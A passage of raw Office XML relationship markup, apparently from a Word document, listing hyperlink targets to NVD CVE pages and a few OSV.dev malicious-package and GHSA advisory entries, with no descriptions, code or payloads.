TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101916" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102266" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102267" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102271" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102272" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102273" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102334" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82375" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101012" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101015" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101280" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101281" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102248" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12267" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86330" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96326" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102335" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55096" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87114" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93538" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97685" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100392" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101898" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101907" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80357" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101900" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101902" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101904" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101908" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101910" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82935" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91154" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102247" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80359" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93000" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101277" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101279" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101914" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102275" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102373" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18417" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19444" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82385" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84744" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93537" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93540" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89303" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101913" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102414" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18415" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82929" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86335" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94194" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102333" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102372" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82546" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102274" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18746" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82936" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70413" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101005" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101013" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101014" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101016" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101017" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101093" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101100" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101859" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82381" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82387" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88828" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93539" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101003" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101101" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101111" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101917" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101918" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102265" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102277" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18825" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52749" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55156" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86838" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89300" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89411" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92996" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80358" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102269" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7170" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7171" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7172" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100370" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101018" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101858" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102263" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59563" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102270" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101006" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101278" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13018" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101861" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97026" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101333" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101915" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102264" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101131" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101079" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101080" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100701" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101062" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101895" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10601" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12249" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19032" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32599" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42127" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42129" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5139" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58197" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6062" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61554" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61628" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61629" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61630" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61672" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61682" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61687" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61709" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61794" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61795" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61833" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61834" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63199" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63405" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63406" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63445" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63458" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6673" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68497" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71485" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77310" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77339" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8074" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81505" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81871" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82399" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83557" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84292" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84394" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85024" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86003" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86043" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87859" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88058" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88932" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9029" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90979" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91006" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9162" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17220" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-456v-xq2p-r4cj" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17212" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17204" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17205" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17207" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17221" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17219" 